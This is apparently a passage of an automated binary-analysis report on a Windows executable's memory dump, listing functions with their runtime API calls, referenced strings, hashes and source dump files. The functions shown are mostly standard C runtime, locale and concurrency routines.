TF_SignerBase: the recoverable message part is too long for the given key and algorithm, xrefs: 0048C08E
for this public key, xrefs: 0048BEF6
: message length of , xrefs: 0048BEA6
doesn't match the required length of , xrefs: 0048BBDE
~`|+, xrefs: 0048B9B7, 0048BC67, 0048BF59, 0048C0D4

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: doesn't match the required length of $ exceeds the maximum of $ for this key$ for this public key$: ciphertext length of $: message length of $: this key is too short to encrypt any messages$TF_SignerBase: the recoverable message part is too long for the given key and algorithm$TF_SignerBase: this algorithm does not support message recovery or the key is too short$~`|+
API String ID: 0-1632643251
Opcode ID: 5f0616c068bfaec36375cf90fbc4b620d8c9de783609bf876321be66d5a2cf7b
Instruction ID: 92a77fd7e5630db3b5fccd8fa2357b8eb01efc07ad0ded657df39687f342e49b
Opcode Fuzzy Hash: 5f0616c068bfaec36375cf90fbc4b620d8c9de783609bf876321be66d5a2cf7b
Instruction Fuzzy Hash: 04528D71E00208AFDB10EFA9C845BDEBBB9FF48314F14855AF805A7351EB34AA45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0046949B, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

Part of subcall function 00460B59: _free.LIBCMT ref: 00460BBB
Part of subcall function 00460B59: _free.LIBCMT ref: 00460BF1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004695A7
IsValidCodePage.KERNEL32(00000000), ref: 004695F0
IsValidLocale.KERNEL32(?,00000001), ref: 004695FF
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00469647
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00469666

Strings

|.L, xrefs: 00469500
~`|+, xrefs: 004694A3

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID: |.L$~`|+
API String ID: 949163717-2709883281
Opcode ID: 4168357d3f4bd0fce2cd5a361c7e189ca1c5c599cdbc40676b9767820a26e1fc
Instruction ID: 45bde57ac9e4bad012e513a1bfe6427166f1a32423f6cf92ca64677a17c1c93c
Opcode Fuzzy Hash: 4168357d3f4bd0fce2cd5a361c7e189ca1c5c599cdbc40676b9767820a26e1fc
Instruction Fuzzy Hash: D9516172A00215ABDF11DFA5CC45ABB73BCAF45700F14456AE912E7250FBF89E018B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004443F0, Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 591COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004446E4
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00444B9F
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00444BEB

Strings

~`|+, xrefs: 0044442C
@, xrefs: 004446FD
~`|+, xrefs: 00444407

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Ios_base_dtorstd::ios_base::_$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: @$~`|+$~`|+
API String ID: 523511559-2366678542
Opcode ID: 2b0f809e44ca9ff6497ba250e11c39eeee904a9dde0d0a7d6f7b642ff9f752dc
Instruction ID: de4bc098043f10c2c74372d4973e4de2c479355a44e5b7f9c41e4b269821701a
Opcode Fuzzy Hash: 2b0f809e44ca9ff6497ba250e11c39eeee904a9dde0d0a7d6f7b642ff9f752dc
Instruction Fuzzy Hash: 3F428F74A002698FEF24CF68C884B9DBBB5BF48304F1485DAE909AB351D774AE85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00424970, Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 548COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00424C71
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004250A0
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004250EC

Strings

@, xrefs: 00424C8A
~`|+, xrefs: 004249AC
~`|+, xrefs: 00424987

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Ios_base_dtorstd::ios_base::_$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: @$~`|+$~`|+
API String ID: 523511559-2366678542
Opcode ID: a0704b23d2da189da8310c0c7850efb7014dcfaf76491d7752ad384a1af6fe2d
Instruction ID: 984a36ef24862d54f23bb5dec191f626937059e9f0a89572bb7eba0cd490d42f
Opcode Fuzzy Hash: a0704b23d2da189da8310c0c7850efb7014dcfaf76491d7752ad384a1af6fe2d
Instruction Fuzzy Hash: 2D325F34A002698FDB24DF58D894BADB7B5FF48304F4581DAE90AAB351DB74AE80CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0049901A, Relevance: 10.8, APIs: 7, Instructions: 284COMMON

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0049911D
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00499169

Part of subcall function 0049A8A4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 0049A997

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 004991D5
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 004991F1
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00499245
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00499272
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004992C8

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID:
API String ID: 2943730970-0
Opcode ID: ecdbe1655adbf5730e469cea2969540a41b624944f5a08ae3fc63c323db40bb4
Instruction ID: 4cd56cb0f244421e9e1b00a692f0c5e4f467628f857d1d3025253f64a94ce2a4
Opcode Fuzzy Hash: ecdbe1655adbf5730e469cea2969540a41b624944f5a08ae3fc63c323db40bb4
Instruction Fuzzy Hash: 4CB16E71A00216AFDF18CF69CA81A7ABBB4FF44304F24857EE8059B351D734AD91CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004454F0, Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 679COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00445586
_strcspn.LIBCMT ref: 004455A8

Strings

%, xrefs: 00445BE6
+, xrefs: 00445BD6
~`|+, xrefs: 00445504, 00445A04, 00445BB9

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: _strcspn
String ID: %$+$~`|+
API String ID: 3709121408-1517093328
Opcode ID: 5b7c0de7583ecc6115eb1266d644e5ac315b7339d45e36a76697feefd13b13fe
Instruction ID: 79f4a2290b21bfec715efce0447b2f6f2e8b363d9c6970f6747d6a80d7de35d0
Opcode Fuzzy Hash: 5b7c0de7583ecc6115eb1266d644e5ac315b7339d45e36a76697feefd13b13fe
Instruction Fuzzy Hash: F442D671E00609DFEF14DFA8C885AAEBBB5FF49300F14851AE815AB352D738AD05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004A85C0, Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 004A85F9

Part of subcall function 004A22AC: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 004A22CD

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 004A865F
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 004A8677
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 004A8684

Part of subcall function 004A811D: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 004A8145
Part of subcall function 004A811D: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 004A81DD
Part of subcall function 004A811D: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 004A81E7
Part of subcall function 004A811D: Concurrency::location::_Assign.LIBCMT ref: 004A821B
Part of subcall function 004A811D: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 004A8223

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: e8ec97338050d3fc574b07fc693f4a06ea1a7d022d1457e390a8a46bf527d86d
Instruction ID: 309f65d091e94eb98547eaf5c1fa0fe19332e0450943b28aa9e6228a9ea87586
Opcode Fuzzy Hash: e8ec97338050d3fc574b07fc693f4a06ea1a7d022d1457e390a8a46bf527d86d
Instruction Fuzzy Hash: F951B235A00214ABDF14DF65C885BAEB775EF55314F1440AEE9027B392CB34AE02CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044ECD5, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,0044EBF1,00000000,00000000,0044ED88,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ECD7
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,0000000C,0044EBF1,00000000,00000000,0044ED88,00000000), ref: 0044ECFD
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED04
InitializeSListHead.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED11
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED26
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0000000C), ref: 0044ED2D

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 6bab67733b2c6c644ad3c2ef648f924461a7a4aefc7891e6b9a082bab3f90ad8
Instruction ID: 328b042921e3adbb03053d30c303d6a029a283724a5d113e75a18aa556b2657a
Opcode Fuzzy Hash: 6bab67733b2c6c644ad3c2ef648f924461a7a4aefc7891e6b9a082bab3f90ad8
Instruction Fuzzy Hash: BFF062716502029BE710AF7EEC08B5736F8FF95716F000839FA56D3350EE28C8418B58

Uniqueness

Uniqueness Score: -1.00%

Function 004692C6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,004695E4,00000002,00000000,?,?,?,004695E4,?,00000000), ref: 0046935F
GetLocaleInfoW.KERNEL32(?,20001004,004695E4,00000002,00000000,?,?,?,004695E4,?,00000000), ref: 00469388
GetACP.KERNEL32(?,?,004695E4,?,00000000), ref: 0046939D

Strings

ACP, xrefs: 004692E4
OCP, xrefs: 0046931A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: f2755373273931f363b24ddab012a7cbd2fac745b2ebabaf4b3077824d19e763
Instruction ID: ef13b7b5e27077ff31e8d40d55d7cf73fee8e7fa281bdbbf4f274cc28b839261
Opcode Fuzzy Hash: f2755373273931f363b24ddab012a7cbd2fac745b2ebabaf4b3077824d19e763
Instruction Fuzzy Hash: F321D632600101AADB308F55C900B9B73AEEB58F54B568466ED0AC7390F7BADE81C35E

Uniqueness

Uniqueness Score: -1.00%

Function 00468F40, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00460B59: GetLastError.KERNEL32(?,00000000,?,0045A0EC,00000000,00000000,?,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460B5E
Part of subcall function 00460B59: SetLastError.KERNEL32(00000000,00000002,000000FF,?,0045BF6A,00000000,00000000,?,?,?), ref: 00460BFC

Part of subcall function 00460B59: _free.LIBCMT ref: 00460BBB
Part of subcall function 00460B59: _free.LIBCMT ref: 00460BF1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00468F94
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00468FDE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004690A4

Strings

~`|+, xrefs: 00468F4B

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free
String ID: ~`|+
API String ID: 3140898709-3443854377
Opcode ID: 4581f5eccaf99fd50cbecfde8423e5ca5bed5d6c51032a3d9934bfec6799801b
Instruction ID: 89a873775b9cdfb4bbffc399d21511ec4b05156dc3f2621ef473cbc2df722c9b
Opcode Fuzzy Hash: 4581f5eccaf99fd50cbecfde8423e5ca5bed5d6c51032a3d9934bfec6799801b
Instruction Fuzzy Hash: 9E619F715002079BEB289F25CC86BBA73ACEF05344F10417BE906CA285F7B8DD81CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0045976E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00459866
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00459870
UnhandledExceptionFilter.KERNEL32(-00000326,?,?,?,?,?,?), ref: 0045987D

Strings

~`|+, xrefs: 00459779

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID: ~`|+
API String ID: 3906539128-3443854377
Opcode ID: fbc2ace19506e32c1c597f57a618ee310cd20f95c1b5139ac48971b980dd06c3
Instruction ID: eaf88a519b5e7ee982348472efea8b4672763d802858d1e092f0cac7ffc827d3
Opcode Fuzzy Hash: fbc2ace19506e32c1c597f57a618ee310cd20f95c1b5139ac48971b980dd06c3
Instruction Fuzzy Hash: 8D31D674911218EBCB21DF69D888BCDBBB8BF18311F5041EAE80CA6251E7749F858F48

Uniqueness

Uniqueness Score: -1.00%

Function 0044EE91, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00421150: InitializeCriticalSectionEx.KERNEL32(004FA428,00000000,00000000,0044EEC0,?,?,?,0042010A), ref: 00421155
Part of subcall function 00421150: GetLastError.KERNEL32(?,?,?,0042010A), ref: 0042115F

IsDebuggerPresent.KERNEL32(?,?,?,0042010A), ref: 0044EEC4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0042010A), ref: 0044EED3

Strings

K, xrefs: 0044EEB4
ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0044EECE

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$K
API String ID: 3511171328-3981460085
Opcode ID: cbe7e3cefe9b4dad3b93a5e7fbc22ee7c4c10779e0388986ed8eb2745bf1d67e
Instruction ID: b09dd05243535db74716e4729027164140001ab21bd1d3c9bf78d40bbcd08a73
Opcode Fuzzy Hash: cbe7e3cefe9b4dad3b93a5e7fbc22ee7c4c10779e0388986ed8eb2745bf1d67e
Instruction Fuzzy Hash: 3EE06D702007518BE724AF2AE9087927AE4BB04344F108D2EE582D3640DBB9D804CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00422D90, Relevance: 4.5, APIs: 3, Instructions: 41COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422D99
LockResource.KERNEL32(00000000,?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422DA4
SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,004F1D4C,?,?,?), ref: 00422DB2

Memory Dump Source

Source File: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 3abb460210da4fb552cf2665600772657526949488247de2d45e4a62d4a9e220
Instruction ID: 7c5bd5554177cc6602ce3481ea2a726f18bfb02dede3a3c675d547f7657f2393
Opcode Fuzzy Hash: 3abb460210da4fb552cf2665600772657526949488247de2d45e4a62d4a9e220
Instruction Fuzzy Hash: 41F0897371123167CB746B69AE885E7F76CDFD2712355093BED46D3260E6A8CC40C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 0045D9CF, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0045D9CE,?,0044D1A5,?,?,?,0045C6FA), ref: 0045D9F1
TerminateProcess.KERNEL32(00000000,?,0045D9CE,?,0044D1A5,?,?,?,0045C6FA), ref: 0045D9F8
ExitProcess.KERNEL32 ref: 0045DA0A

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 9f5b69520229884a9305c7fe4b6fd90c067f92877e96ef5ac53f2beabdc0e8d9
Instruction ID: b3b7cbcd34d3f0472d403bd10e47f38e08b458265541c7203384a4d3c222afdb
Opcode Fuzzy Hash: 9f5b69520229884a9305c7fe4b6fd90c067f92877e96ef5ac53f2beabdc0e8d9
Instruction Fuzzy Hash: 58E04631400149ABCF266F68DD4D9893B29EF00342F000229FD0586232CB39ED86DA48

Uniqueness

Uniqueness Score: -1.00%

Function 0048D7F0, Relevance: 4.4, Strings: 3, Instructions: 627COMMON

Download Yara Rule

Strings

@, xrefs: 0048DC6F
@, xrefs: 0048DA76
~`|+, xrefs: 0048D807

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942581218.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.942610172.0000000000432000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.942616615.0000000000433000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.942688548.00000000004B9000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942727016.00000000004F4000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.942773407.0000000000545000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @$@$~`|+
API String ID: 0-2689945750
Opcode ID: 619c3b28d1da352b0e3dac42b5406ab1984f687d219c40618210d68ef9b6d4de
Instruction ID: c545a94a9defb1b68176cb18c6ca3c4638153fa0b2d190d0668667a4173c5b4b
Opcode Fuzzy Hash: 619c3b28d1da352b0e3dac42b5406ab1984f687d219c40618210d68ef9b6d4de
Instruction Fuzzy Hash: 5B429D71D01258CFDB24EFA8C980BAEBBB1BF48304F14455ED446AB382DB78AD45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00466410, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

~`|+, xrefs: 004664CF

Memory Dump Source

Source File: 00000001.00000002.942623092.0000000000435000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.942572975.0000000000400000.00000002.00020000.sdmp Download File
